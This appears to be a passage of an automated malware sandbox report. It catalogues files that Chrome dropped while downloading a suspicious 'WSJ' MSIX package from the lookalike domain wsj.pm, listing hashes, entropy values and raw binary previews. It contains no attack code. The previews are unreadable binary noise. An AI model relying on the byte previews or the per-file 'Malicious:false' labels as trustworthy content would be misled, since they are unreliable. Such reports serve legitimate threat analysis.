                                                                                                                File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Thu Apr 25 13:58:17 2024, atime=Mon Oct 2 20:46:57 2023, length=1210144, window=hide
                                                                                                                Category:dropped
                                                                                                                Size (bytes):2683
                                                                                                                Entropy (8bit):4.00655702083067
                                                                                                                Encrypted:false
                                                                                                                SSDEEP:48:8fi2djTA7lxSHFidAKZdA1duT6ehOuTbbiZUk5OjqehOuTbcdy+yT+:8fiK8xtTTTbxWOvTbcdy7T
                                                                                                                MD5:B9890B755AE8885CB7E4A789F990C739
                                                                                                                SHA1:E6F9E83B9990EF23EE95F0B951366C5B8CFB30B4
                                                                                                                SHA-256:7CAC02D0F2523265DAE8385A1BE51E08FAF0CB00FBB5C4644BCFBF364B37CD9C
                                                                                                                SHA-512:451593B910C9C38A90305D000920C356A8C3D2236CB38F9843A31828567BDFC1E5D94648D5775F49E1BC2412CECE1E5DAF0CD6DDE86CA27B368228BEF3AD53E7
                                                                                                                Malicious:false
                                                                                                                Reputation:low
                                                                                                                Preview:L..................F.@.. ...$+.,....M`D.!.......y... w......................1....P.O. .:i.....+00.../C:\.....................1.....FWoN..PROGRA~1..t......O.I.X@w....B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V.XHw....L.....................p+j.G.o.o.g.l.e.....T.1.....FW.N..Chrome..>......CW.V.XHw....M......................W..C.h.r.o.m.e.....`.1.....FW.N..APPLIC~1..H......CW.V.XHw...........................W..A.p.p.l.i.c.a.t.i.o.n.....n.2. w..BW. .CHROME~1.EXE..R......CW.V.XIw...........................3.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i............^.......C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F

                                                                                                                C:\Users\user\Downloads\9ca62580-b258-4627-882b-7b61e4af3c6e.tmp

                                                                                                                Download File
                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                File Type:Zip archive data, at least v4.5 to extract, compression method=deflate
                                                                                                                Category:dropped
                                                                                                                Size (bytes):32513
                                                                                                                Entropy (8bit):7.986736145523285
                                                                                                                Encrypted:false
                                                                                                                SSDEEP:768:671h8v/m+YqjoFGyBs32tsFauzgHNUwsv8nUZ0O:67Agqv0SF3zgHyv8ng
                                                                                                                MD5:B17685772BE648FB024AEFAD002B342D
                                                                                                                SHA1:7D78E2BE539BA76A6DA46E47F5C8AE09163FF269
                                                                                                                SHA-256:4E123C220BDEC495617D51397838F53B3C60B750510C75DCA119577D41E4CA81
                                                                                                                SHA-512:6CEF94613C535CB0D6F44775DC67A1A5E7AE56B35C73204A3E9AF9E712F3784F7B2287CC335A1E8F31E7555599C3E6545BE67D2D43784937069E73082CFBC6C1
                                                                                                                Malicious:false
                                                                                                                Reputation:low
                                                                                                                Preview:PK..-......%.X................Registry.dat.}.|..g..1/A.. ...p...c$...g4.,a.......3.........2ds.. ......r....$..p8.....c.Y......BrYA....m.I.......hF.66.6*.....g}U]].4..Wh.FP......wq.z!....3.7d.........'.V|...s....e..{1....X.....5...e.,k`Y...X....Jh`8...Se......[...v.=...M1y........;<fin'.m..N.....~.n.njD.OX...X...M`..0.....h,....x.j+$.S..y.2.$.h.....>p/@I.W.X.w.Y@[QP.........PC.#....q....>HSV.i.J.........k.....q^.9I.B...}.=e..S.~M........w...b.?...|....VM.@E..o.|...g}..g..../.0..."{_m..nh.M..>.)=n?Y...-.Wt...\.]....%...$.1......zP.... ..._lhG.......l....O...z...nP..~M.J.^./&.%..yx.....o...y.t~..c..A%l?V}....t.....V_"..I&.XzS.H.:Zn.9O7.fhO%..ohk..T.}..o.y.....z*e.r~s.t>.|/N~.}.O.rZ.i....=...t.2.".d<..L.'.Q........m....z.J.UuRF&........s..< ..x.H..2.....(G.c.W...X.o....n.z.....k.Z........Z...n.nF...F........i..B;...@.$..7..L...L.l..R......]....+...c.W~..v-F..?....'..t2.......J.#....V.f.%./..1A.{...b.Z...0.+:V9....*.Q19..?.....a ..w..vt....).[

                                                                                                                C:\Users\user\Downloads\Unconfirmed 423205.crdownload

                                                                                                                Download File
                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                File Type:Zip archive data, at least v4.5 to extract, compression method=deflate
                                                                                                                Category:dropped
                                                                                                                Size (bytes):1064965
                                                                                                                Entropy (8bit):7.997699899695652
                                                                                                                Encrypted:true
                                                                                                                SSDEEP:24576:/nGpZCSOG9vMctFkyggn+Qce6X/di+J72iPgnrT:epkzG99tFkyLkei/8+J71IH
                                                                                                                MD5:2BCB8F589CA7F5910883DAD50B7E11DF
                                                                                                                SHA1:9A29D41B5AFEC950F90DAEF45762455C47B7098D
                                                                                                                SHA-256:F015DA1F2ADA32F734B81AA282BEA62840CD84AFAA353CA52D5E2D0C82E705D1
                                                                                                                SHA-512:4E731C5C66BD590D83D10541AB4DCC4717A12067ABBC353790B4FB5E6FFFA854C1C29784F7D9903C58DBF8D730A556AD12CB4CDFB6A48A2420431E3E7E1DFB0C
                                                                                                                Malicious:false
                                                                                                                Reputation:low
                                                                                                                Preview:PK..-......%.X................Registry.dat.}.|..g..1/A.. ...p...c$...g4.,a.......3.........2ds.. ......r....$..p8.....c.Y......BrYA....m.I.......hF.66.6*.....g}U]].4..Wh.FP......wq.z!....3.7d.........'.V|...s....e..{1....X.....5...e.,k`Y...X....Jh`8...Se......[...v.=...M1y........;<fin'.m..N.....~.n.njD.OX...X...M`..0.....h,....x.j+$.S..y.2.$.h.....>p/@I.W.X.w.Y@[QP.........PC.#....q....>HSV.i.J.........k.....q^.9I.B...}.=e..S.~M........w...b.?...|....VM.@E..o.|...g}..g..../.0..."{_m..nh.M..>.)=n?Y...-.Wt...\.]....%...$.1......zP.... ..._lhG.......l....O...z...nP..~M.J.^./&.%..yx.....o...y.t~..c..A%l?V}....t.....V_"..I&.XzS.H.:Zn.9O7.fhO%..ohk..T.}..o.y.....z*e.r~s.t>.|/N~.}.O.rZ.i....=...t.2.".d<..L.'.Q........m....z.J.UuRF&........s..< ..x.H..2.....(G.c.W...X.o....n.z.....k.Z........Z...n.nF...F........i..B;...@.$..7..L...L.l..R......]....+...c.W~..v-F..?....'..t2.......J.#....V.f.%./..1A.{...b.Z...0.+:V9....*.Q19..?.....a ..w..vt....).[

                                                                                                                C:\Users\user\Downloads\Unconfirmed 427628.crdownload (copy)

                                                                                                                Download File
                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                File Type:Zip archive data, at least v4.5 to extract, compression method=deflate
                                                                                                                Category:dropped
                                                                                                                Size (bytes):1064965
                                                                                                                Entropy (8bit):7.997699899695652
                                                                                                                Encrypted:true
                                                                                                                SSDEEP:24576:/nGpZCSOG9vMctFkyggn+Qce6X/di+J72iPgnrT:epkzG99tFkyLkei/8+J71IH
                                                                                                                MD5:2BCB8F589CA7F5910883DAD50B7E11DF
                                                                                                                SHA1:9A29D41B5AFEC950F90DAEF45762455C47B7098D
                                                                                                                SHA-256:F015DA1F2ADA32F734B81AA282BEA62840CD84AFAA353CA52D5E2D0C82E705D1
                                                                                                                SHA-512:4E731C5C66BD590D83D10541AB4DCC4717A12067ABBC353790B4FB5E6FFFA854C1C29784F7D9903C58DBF8D730A556AD12CB4CDFB6A48A2420431E3E7E1DFB0C
                                                                                                                Malicious:false
                                                                                                                Reputation:low
                                                                                                                Preview:PK..-......%.X................Registry.dat.}.|..g..1/A.. ...p...c$...g4.,a.......3.........2ds.. ......r....$..p8.....c.Y......BrYA....m.I.......hF.66.6*.....g}U]].4..Wh.FP......wq.z!....3.7d.........'.V|...s....e..{1....X.....5...e.,k`Y...X....Jh`8...Se......[...v.=...M1y........;<fin'.m..N.....~.n.njD.OX...X...M`..0.....h,....x.j+$.S..y.2.$.h.....>p/@I.W.X.w.Y@[QP.........PC.#....q....>HSV.i.J.........k.....q^.9I.B...}.=e..S.~M........w...b.?...|....VM.@E..o.|...g}..g..../.0..."{_m..nh.M..>.)=n?Y...-.Wt...\.]....%...$.1......zP.... ..._lhG.......l....O...z...nP..~M.J.^./&.%..yx.....o...y.t~..c..A%l?V}....t.....V_"..I&.XzS.H.:Zn.9O7.fhO%..ohk..T.}..o.y.....z*e.r~s.t>.|/N~.}.O.rZ.i....=...t.2.".d<..L.'.Q........m....z.J.UuRF&........s..< ..x.H..2.....(G.c.W...X.o....n.z.....k.Z........Z...n.nF...F........i..B;...@.$..7..L...L.l..R......]....+...c.W~..v-F..?....'..t2.......J.#....V.f.%./..1A.{...b.Z...0.+:V9....*.Q19..?.....a ..w..vt....).[

                                                                                                                C:\Users\user\Downloads\WSJ (1).msix (copy)

                                                                                                                Download File
                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                File Type:Zip archive data, at least v4.5 to extract, compression method=deflate
                                                                                                                Category:dropped
                                                                                                                Size (bytes):1064965
                                                                                                                Entropy (8bit):7.997699899695652
                                                                                                                Encrypted:true
                                                                                                                SSDEEP:24576:/nGpZCSOG9vMctFkyggn+Qce6X/di+J72iPgnrT:epkzG99tFkyLkei/8+J71IH
                                                                                                                MD5:2BCB8F589CA7F5910883DAD50B7E11DF
                                                                                                                SHA1:9A29D41B5AFEC950F90DAEF45762455C47B7098D
                                                                                                                SHA-256:F015DA1F2ADA32F734B81AA282BEA62840CD84AFAA353CA52D5E2D0C82E705D1
                                                                                                                SHA-512:4E731C5C66BD590D83D10541AB4DCC4717A12067ABBC353790B4FB5E6FFFA854C1C29784F7D9903C58DBF8D730A556AD12CB4CDFB6A48A2420431E3E7E1DFB0C
                                                                                                                Malicious:false
                                                                                                                Reputation:low
                                                                                                                Preview:PK..-......%.X................Registry.dat.}.|..g..1/A.. ...p...c$...g4.,a.......3.........2ds.. ......r....$..p8.....c.Y......BrYA....m.I.......hF.66.6*.....g}U]].4..Wh.FP......wq.z!....3.7d.........'.V|...s....e..{1....X.....5...e.,k`Y...X....Jh`8...Se......[...v.=...M1y........;<fin'.m..N.....~.n.njD.OX...X...M`..0.....h,....x.j+$.S..y.2.$.h.....>p/@I.W.X.w.Y@[QP.........PC.#....q....>HSV.i.J.........k.....q^.9I.B...}.=e..S.~M........w...b.?...|....VM.@E..o.|...g}..g..../.0..."{_m..nh.M..>.)=n?Y...-.Wt...\.]....%...$.1......zP.... ..._lhG.......l....O...z...nP..~M.J.^./&.%..yx.....o...y.t~..c..A%l?V}....t.....V_"..I&.XzS.H.:Zn.9O7.fhO%..ohk..T.}..o.y.....z*e.r~s.t>.|/N~.}.O.rZ.i....=...t.2.".d<..L.'.Q........m....z.J.UuRF&........s..< ..x.H..2.....(G.c.W...X.o....n.z.....k.Z........Z...n.nF...F........i..B;...@.$..7..L...L.l..R......]....+...c.W~..v-F..?....'..t2.......J.#....V.f.%./..1A.{...b.Z...0.+:V9....*.Q19..?.....a ..w..vt....).[

                                                                                                                C:\Users\user\Downloads\e741087a-defc-4dd8-a5ef-58ca00c61c80.tmp

                                                                                                                Download File
                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                File Type:Zip archive data, at least v4.5 to extract, compression method=deflate
                                                                                                                Category:dropped
                                                                                                                Size (bytes):1064965
                                                                                                                Entropy (8bit):7.997699899695652
                                                                                                                Encrypted:true
                                                                                                                SSDEEP:24576:/nGpZCSOG9vMctFkyggn+Qce6X/di+J72iPgnrT:epkzG99tFkyLkei/8+J71IH
                                                                                                                MD5:2BCB8F589CA7F5910883DAD50B7E11DF
                                                                                                                SHA1:9A29D41B5AFEC950F90DAEF45762455C47B7098D
                                                                                                                SHA-256:F015DA1F2ADA32F734B81AA282BEA62840CD84AFAA353CA52D5E2D0C82E705D1
                                                                                                                SHA-512:4E731C5C66BD590D83D10541AB4DCC4717A12067ABBC353790B4FB5E6FFFA854C1C29784F7D9903C58DBF8D730A556AD12CB4CDFB6A48A2420431E3E7E1DFB0C
                                                                                                                Malicious:false
                                                                                                                Reputation:low
                                                                                                                Preview:PK..-......%.X................Registry.dat.}.|..g..1/A.. ...p...c$...g4.,a.......3.........2ds.. ......r....$..p8.....c.Y......BrYA....m.I.......hF.66.6*.....g}U]].4..Wh.FP......wq.z!....3.7d.........'.V|...s....e..{1....X.....5...e.,k`Y...X....Jh`8...Se......[...v.=...M1y........;<fin'.m..N.....~.n.njD.OX...X...M`..0.....h,....x.j+$.S..y.2.$.h.....>p/@I.W.X.w.Y@[QP.........PC.#....q....>HSV.i.J.........k.....q^.9I.B...}.=e..S.~M........w...b.?...|....VM.@E..o.|...g}..g..../.0..."{_m..nh.M..>.)=n?Y...-.Wt...\.]....%...$.1......zP.... ..._lhG.......l....O...z...nP..~M.J.^./&.%..yx.....o...y.t~..c..A%l?V}....t.....V_"..I&.XzS.H.:Zn.9O7.fhO%..ohk..T.}..o.y.....z*e.r~s.t>.|/N~.}.O.rZ.i....=...t.2.".d<..L.'.Q........m....z.J.UuRF&........s..< ..x.H..2.....(G.c.W...X.o....n.z.....k.Z........Z...n.nF...F........i..B;...@.$..7..L...L.l..R......]....+...c.W~..v-F..?....'..t2.......J.#....V.f.%./..1A.{...b.Z...0.+:V9....*.Q19..?.....a ..w..vt....).[

                                                                                                                Chrome Cache Entry: 134

                                                                                                                Download File
                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                File Type:MS Windows icon resource - 4 icons, 64x64, 8 bits/pixel, 48x48, 8 bits/pixel
                                                                                                                Category:dropped
                                                                                                                Size (bytes):13094
                                                                                                                Entropy (8bit):4.576028578695119
                                                                                                                Encrypted:false
                                                                                                                SSDEEP:96:YhMLi659RUz8oFQV6P6z/B8tCifom3RQwgVCOYgLKuam8ArAVw56LC/zjfcqf9SE:YhM+Zz8YI6PAaCsomBQw9OgGq27gqfF
                                                                                                                MD5:14A1E4EF44C0757C4381FBE3763701B0
                                                                                                                SHA1:FC6976A0F023BB3F4C0DBF9B2DFD1DFB28D11537
                                                                                                                SHA-256:307EBAA6F26198D5065D01BD55A106CE61F4346C5DBE48DDCE137F7644EA6BF2
                                                                                                                SHA-512:93CD089018A5E6CB14F9BAA1404B68DA69C682DF2AC38460D4DDB06B0BC5A7EA1C6CE8F984C24827C624E9522AE54DAC27EEBBAF88DBEDF096FAF2B6284AE14A
                                                                                                                Malicious:false
                                                                                                                Reputation:low
                                                                                                                Preview:......@@......(...F...00..........n... ...........%..........h....-..(...@...............................................SSS.............................EEE.............\\\. .........sss.777.........NNN.............eee.))).........@@@.................nnn.222.............III.............$$$.........www.;;;.....................iii.---.............DDD.........[[[.........rrr.666.....MMM.........ddd.(((.........{{{.???.............VVV.............mmm.111.............HHH.........___.###.........vvv.:::.....QQQ.............hhh.,,,.........................ZZZ.............qqq.555.........LLL.........ccc.'''.........zzz.>>>.............UUU.....lll.000.............GGG.............^^^.""".........uuu.999.....PPP.............ggg.+++.........~~~.............YYY.............ppp.444.........KKK.........bbb.&&&.........yyy.===.............TTT.............kkk.///.............FFF.]]].!!!.........888.........OOO.............fff.***.........}}}.AAA.........................ooo.333.........JJJ...........

                                                                                                                Chrome Cache Entry: 135

                                                                                                                Download File
                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                File Type:JPEG image data, baseline, precision 8, 287x191, components 3
                                                                                                                Category:downloaded
                                                                                                                Size (bytes):9586
                                                                                                                Entropy (8bit):7.955142632385518
                                                                                                                Encrypted:false
                                                                                                                SSDEEP:192:nQPdQF3ztHakymnpTHy4BpC7DFvuP6Aq5bhyqIrokvFWHM7BW8:UgzymnpTSiC3FvuPGbhLILFoQf
                                                                                                                MD5:25CE6FA9798693A805D126956321CA82
                                                                                                                SHA1:3D1DDAE0DE494326B82E7056B371277630AB3634
                                                                                                                SHA-256:6D14CAE3C1B8D3710C1774DA1130CDE2EFC6DF295525A01BA81259583648CFF8
                                                                                                                SHA-512:0AD60AA52ABAC239A6874BD16298243A668DEF78C3E8005CDAE043D3AD56DA0086687380F1D92F8C900711223AE0DC7B6770695A6B4F670BE7F714369439F825
                                                                                                                Malicious:false
                                                                                                                Reputation:low
                                                                                                                URL:https://wsj.pm/img/im-948848.jpeg
                                                                                                                Preview:.....C.....................................%...#... , #&')*)..-0-(0%()(...C...........(...((((((((((((((((((((((((((((((((((((((((((((((((((..........."........................................=.........................!.1.AQa"q..#2B...3R....r..4....$bs..............................$.......................!1.AQ.a"2Bq............?..[..P..@..q^...@P.Wv.*q#.DDs.V=N[..91..d..E&...R.7..k..s].2E.P...q@.E-E2.Gv..F<..H).......|....J.h*)`.mw).T.M!.....2..)...wj.Y.rk.'..l.{..l.e...Z....(C!.&........I.C.9..iOe.-.....j....Y.F...1,r.&..B^3..ir.c .k...x.....d.....*_....v......R.7.(.^.;hv.G.F.X!...h.b..u.......6f..".JUf..O.U....a.:q.=.......+H.R}.9y.]"....tl..U.G.4.X......FZ....b...e't../..b^l}..uV...g........%...J!.hV.Z<.pET....bu#..U.Z.......sX.d .)...NF)...S.3ah..E..y.wJ....1I....T..1A.r.V^...<`.Ubri..}..!.YN#..jn.....]..9._...v;K.... ...i..:+..n....qR.O..x.Y..z..............{...uG._'<..w.:....F.....vc..yf..t.%..t..Hc...}........$.YQ8.}8....L..,...Fb>#K...;.......By^...&...

                                                                                                                Chrome Cache Entry: 136

                                                                                                                Download File
                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                File Type:MS Windows icon resource - 4 icons, 64x64, 8 bits/pixel, 48x48, 8 bits/pixel
                                                                                                                Category:downloaded
                                                                                                                Size (bytes):13094
                                                                                                                Entropy (8bit):4.576028578695119
                                                                                                                Encrypted:false
                                                                                                                SSDEEP:96:YhMLi659RUz8oFQV6P6z/B8tCifom3RQwgVCOYgLKuam8ArAVw56LC/zjfcqf9SE:YhM+Zz8YI6PAaCsomBQw9OgGq27gqfF
                                                                                                                MD5:14A1E4EF44C0757C4381FBE3763701B0
                                                                                                                SHA1:FC6976A0F023BB3F4C0DBF9B2DFD1DFB28D11537
                                                                                                                SHA-256:307EBAA6F26198D5065D01BD55A106CE61F4346C5DBE48DDCE137F7644EA6BF2
                                                                                                                SHA-512:93CD089018A5E6CB14F9BAA1404B68DA69C682DF2AC38460D4DDB06B0BC5A7EA1C6CE8F984C24827C624E9522AE54DAC27EEBBAF88DBEDF096FAF2B6284AE14A
                                                                                                                Malicious:false
                                                                                                                Reputation:low
                                                                                                                URL:https://wsj.pm/favicon.ico
                                                                                                                Preview:......@@......(...F...00..........n... ...........%..........h....-..(...@...............................................SSS.............................EEE.............\\\. .........sss.777.........NNN.............eee.))).........@@@.................nnn.222.............III.............$$$.........www.;;;.....................iii.---.............DDD.........[[[.........rrr.666.....MMM.........ddd.(((.........{{{.???.............VVV.............mmm.111.............HHH.........___.###.........vvv.:::.....QQQ.............hhh.,,,.........................ZZZ.............qqq.555.........LLL.........ccc.'''.........zzz.>>>.............UUU.....lll.000.............GGG.............^^^.""".........uuu.999.....PPP.............ggg.+++.........~~~.............YYY.............ppp.444.........KKK.........bbb.&&&.........yyy.===.............TTT.............kkk.///.............FFF.]]].!!!.........888.........OOO.............fff.***.........}}}.AAA.........................ooo.333.........JJJ...........

                                                                                                                Chrome Cache Entry: 137

                                                                                                                Download File
                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                File Type:JPEG image data, baseline, precision 8, 110x62, components 3
                                                                                                                Category:downloaded
                                                                                                                Size (bytes):3217
                                                                                                                Entropy (8bit):7.863271626454483
                                                                                                                Encrypted:false
                                                                                                                SSDEEP:96:O8N0J4lnCv7UjsmyllF8lhJSWJDCFN28bnNHMO+:OM0WRjsjln8lhJlJaTbnFZ+
                                                                                                                MD5:7BAF32D64415A8E528351FD3ED41A17C
                                                                                                                SHA1:D10F019DA7E91FBB10B3AC97527DAA8F14040EDB
                                                                                                                SHA-256:B6C0551166BB49DA210D4C762E9BBE954E6B0E84112BCDA05C3BF7D1D356C018
                                                                                                                SHA-512:B6969B797A4E1868BDA2E611143B112263D476900BF64AA5D0A8CA85E13BA75D2F3342FE32C99974C92A919D6F5A91354DF4418788DB2A5F54395EB7658328B7
                                                                                                                Malicious:false
                                                                                                                Reputation:low
                                                                                                                URL:https://wsj.pm/img/im-949113.jpeg
                                                                                                                Preview:.....C.....................................%...#... , #&')*)..-0-(0%()(...C...........(...((((((((((((((((((((((((((((((((((((((((((((((((((......>.n.."........................................?.........................!.1AQ.."a.q..2..#$BRb.3r..45CS....................................../........................!1A..q."Qa.......B...............?..+.kO*6.g.......0h.......b.,~v.......T.H.i?........SU*....^b.+r...*.c{...E..e.fa.Z....b..3...zL.-.a..f.&d...t,:_I...\....%...i...K.Z.rt.....&..N.vTi.]n.R..6...m....G,.....4...d.tN....ymd..E$..SA9f%.h...f..rv.+.Lh^J4EQv-R...<.4......ca...W.g..9N.>WG.F.2..O.q <..!..c5d.s.ISP.f.I.J.S..e(..]b...$a....:n=].....T.e......KG....8.An.l$x.}f.b6...._..m...aG....8..|Ga......fAv...c"8Aj.Q}F.....S..R....%..3.\..'.[a.R.R...,X..._....`~|..q.#._.e.u.9?.....1.F..B.E....T...R.Jj*-...{-......q->w..\.b.V."..6.o.....~-.x..O$.ST..xP...<.......Q...KC-^...B.mk.....[J..{...qy....I...>U2...........5Y.........&.....g..%..y....">...h..

                                                                                                                Chrome Cache Entry: 138

                                                                                                                Download File
                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                File Type:PNG image data, 110 x 62, 8-bit/color RGBA, non-interlaced
                                                                                                                Category:downloaded
                                                                                                                Size (bytes):21892
                                                                                                                Entropy (8bit):7.981012051227347
                                                                                                                Encrypted:false
                                                                                                                SSDEEP:384:AAOaWsmquqNH2D+QnjYmR9nEuCknDj6Wlke3NtAT/Df/b5L6ZHvXoWToO2p/w6q:ld/uqED1j3DnEHzFuC3f/bwZP4KZ
                                                                                                                MD5:C0D70F65DBDAA013E2DC79DF3BBE656A
                                                                                                                SHA1:332488A7515510658B6B0E81E439CDBECD48282E
                                                                                                                SHA-256:E4C4E1E817ED689070DDF3A80452B5B8CD0407DC495145D2143603EBFAB1FE69
                                                                                                                SHA-512:1408DE608CD1CC07EC7A5D4B6804C6F120E43F28E80CF2C8935951E24BBBD4975BF34A8A72BD8D0DF81E7D9F6109C72EBFAABD8E62A86E8056BF63AA3AE0EBE2
                                                                                                                Malicious:false
                                                                                                                Reputation:low
                                                                                                                URL:https://wsj.pm/img/im-948629.png
                                                                                                                Preview:.PNG........IHDR...n...>.............pHYs...#...#.x.?v.. .IDATx.<..Ug....0.1scn.LWwU.TB..d.<.{.?..>!3!-.d..x.@B d. @ .ITI*......7..M......6.......z...^..s..p..rR....x.IDi...$]..b.....z)?.E.?...../...~.."6..#......PX...2~.A.kE.J....u.....W...._....%...vc....J.J.....5.r.r...)@"..$S.NW. .W..?CS...#.W..TUOkM...&.3.t..}p.-........".G6..o...!..N..k..-.L..1.<.d. [[.......,.N2.1...qv...:..##.......,..o..I.l......;z.m......!j....Q..8q...T...#...f.....NZ2m.d.h.id.......u....RC3.u..%j..i.+.H{...~..zZc!..~.6#U.+...Y....L@.....(+........?..z1?}.._./B(...y....r1..../(....|}.?..F...^.B!..*x...b.4....9b...r9.K.8..dj3......&ZZ....c..H.b.V....\[..7.r}q.W..e3..g8;7.....sbq.S..}`...Z..tW73...@s/.....f..f...1..g~p..]..4w.ob......7qtb......3..m......0...o.!.H6.@6VK.".K.ld...........E...k.&911..I.Z^..i&z..t.9.k..N....6...........;....d]qi).J....Y_T.R&.k4b.....c....8.Z<&.N...Y.L".3....Z,..J~..z~.......?....._..bQ.1j........u&.:3Q....N."..R..1...LW..:;.=9

                                                                                                                Chrome Cache Entry: 139

                                                                                                                Download File
                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                File Type:JPEG image data, baseline, precision 8, 220x220, components 3
                                                                                                                Category:dropped
                                                                                                                Size (bytes):19278
                                                                                                                Entropy (8bit):7.955056509183606
                                                                                                                Encrypted:false
                                                                                                                SSDEEP:384:P1uLxSxDqCD9H7ol7hMsIJ8ma+fxyDkjSzv2GuM7yqOQEzaDlGATI:tmShqsH0li8m/59WvLuM77Ezt/
                                                                                                                MD5:1E7CBBB9A79C65F967FDC172715AB05D
                                                                                                                SHA1:B7D651316ACF3BB2B79BD668861E273C9D5D69B8
                                                                                                                SHA-256:E9334EA9DD833D3CB2DD39DC0C6D6FCF044170D7B92031820B2FF234BB3B4348
                                                                                                                SHA-512:C96B05DC36B325FF926DD222E22D8908DD03A9338C3D6E12672F2BFB0B4ED608C1EF2B0C0F02117637C28CAE28DE329DEDF4DF2D07E5A0DCFD7683322970FF67
                                                                                                                Malicious:false
                                                                                                                Reputation:low
                                                                                                                Preview:.....C.....................................%...#... , #&')*)..-0-(0%()(...C...........(...((((((((((((((((((((((((((((((((((((((((((((((((((..........."........................................>..........................!."1..A#2Q.Ba..$3Rq.b...CS.%r.............................................................?......................?....f..U9..l.....$...........J..7s..KR..B.=...g..t6~..e.y..v....9.s.4..QW..(..n.|...;....;w....T...`q...I.z..}....co.f....RFO]-...31!..b.#..>D.Y...M...AQ..o.'..LU.q...$.n:M.z#..;7.6LN8...........S.g...?pP.F....y..)6JHAf..|..,..}....s......7...RKjfe.#.(Z/%.v.....r..8/d.d%..zh.H.PM...WW......'FO.....f....W.....sKX.fq.'..zD.o.....:.q..R..^y.Y...........Ljc .S..t..../..k.b.....L.Eo.0..6..G.Z>%...*l.....6..[..9.....&?0.i.UI......p...=.c..4..c%=...../..0..9h.x...[N1........D.o.mZk.iA43........Dx........... 1..B.......h..$...h}..jY%.e.p[.... ..^...d.[..V...s?..a..-{U..v......s&....mI.....2.v...3.b...^.jK..........<\.:...WlF..I5.....

                                                                                                                Chrome Cache Entry: 140

                                                                                                                Download File
                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                File Type:JSON data
                                                                                                                Category:downloaded
                                                                                                                Size (bytes):23
                                                                                                                Entropy (8bit):3.6211755429194716
                                                                                                                Encrypted:false
                                                                                                                SSDEEP:3:YM0uRn:YM0uR
                                                                                                                MD5:8183B9A40CF91DC91EE64E402122F07C
                                                                                                                SHA1:3F2EAD7013B407FC83ECFDB34B2120003D88982A
                                                                                                                SHA-256:B3849D6557B393391A2530A78375643A147278269DB19B8855798A1DEC085E53
                                                                                                                SHA-512:2B2BD2D0F215820ED342BA8E6766EE2B97CC0CD215831FFC587F83A8E4D47AEA23DADF7C1EB6CF8388E6CF4FB77DFA82BDB06115B05437EFA4A94C2ADED08E77
                                                                                                                Malicious:false
                                                                                                                Reputation:low
                                                                                                                URL:https://api.ipify.org/?format=json
                                                                                                                Preview:{"ip":"185.152.66.230"}

                                                                                                                Chrome Cache Entry: 141

                                                                                                                Download File
                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                File Type:SVG Scalable Vector Graphics image
                                                                                                                Category:downloaded
                                                                                                                Size (bytes):6475
                                                                                                                Entropy (8bit):4.957213986967474
                                                                                                                Encrypted:false
                                                                                                                SSDEEP:96:dWdNI6wvTaqU8aPqF3MqSfotMqLmnESFwUp6NIBbTv15usrdlyKMihexJRSoUgvw:dWrjIoYBSeUp6CBbTvTuk0lvkLES
                                                                                                                MD5:4699F3C28A26DE50BDE7EB2E516C4616
                                                                                                                SHA1:6792A6F7034F97C1E99468CA66751C6BC27C3838
                                                                                                                SHA-256:F173CE9ABA85239293AA2D30B59D8E9769AB57261A63376147B22773F84972BB
                                                                                                                SHA-512:F63F326AB97104B019158A3BCFAF74716366F358209431BC087D11D057896FA66A2E51490AF8843F0E2EE432D1340A700D42482E95D6E1514387DDEE61641CF8
                                                                                                                Malicious:false
                                                                                                                Reputation:low
                                                                                                                URL:https://wsj.pm/img/google-play.4699f3c2.svg
